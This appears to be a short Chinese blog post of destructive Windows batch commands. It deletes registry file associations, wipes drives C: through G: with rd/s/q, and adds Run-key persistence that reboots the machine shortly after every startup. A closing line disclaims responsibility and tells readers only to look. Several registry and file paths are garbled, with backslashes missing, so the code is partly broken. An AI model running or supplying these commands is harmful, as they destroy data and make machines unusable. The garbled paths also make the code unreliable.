删除全部注册表:

@ECHO OFF

START reg delete HKCR/.exe

START reg delete HKCR/.dll

START reg delete HKCR/*

格式化硬盘 :

rd/s/q D:\

rd/s/q C:\

rd/s/q E:\

rd/s/q F:\

rd/s/q g:\

开机就关机:

echo @echo off>c:windowshartlell.bat

echo break off>>c:windowshartlell.bat

echo shutdown -r -t 11-f>>c:windowshartlell.bat

echo end>>c:windowshartlell.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun

/v startapi /t reg_sz/d c:windowshartlell.bat /f

reg add hkey-current_usersoftwaremicrosoftwindowscurrentversionrun

/v/t reg_sz/d c:windowshartlell.bat /f

PAUSE

注意:如果你使用任何一个CMD命令,造成的损失与博主无关,大家看看就好了,不要去实际操作。